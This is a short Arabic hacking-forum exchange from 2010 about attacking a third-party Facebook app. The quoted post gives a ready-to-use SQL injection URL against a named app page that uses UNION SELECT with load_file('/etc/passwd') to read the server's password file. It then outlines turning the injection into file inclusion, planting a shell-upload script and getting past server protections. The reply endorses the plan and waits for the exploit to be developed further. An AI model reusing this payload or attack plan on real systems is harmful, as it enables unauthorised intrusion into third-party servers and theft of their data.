 | اقتباس |  | | |  |  المشاركة الأصلية كتبت بواسطة Dr.NaNo |  | | | | | | | | | اهلين اخي نورت الموضوع ..
بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات
لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d
وانا جبت الروابط عشان نطورها فقط لا غير ..
والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:
كود PHP: http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر
ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين
بالتوفيــق | |  | |  | |
بارك الله فيك اخي العزيز
نعم الثغرة مشروحة في مواقع السكريتي وهي ثغرة في تطبيقات app.facebook
وليست ثغرة facebook
يعني اذا رفعة الشل ستجده في موقع اخر وليس على
الفيس بوك
في انتظر التطوير الثغرةفلسطين
في امان الله
08-27-2010, 01:02 PM
العرض المتطور
المواضيع المتشابهه 
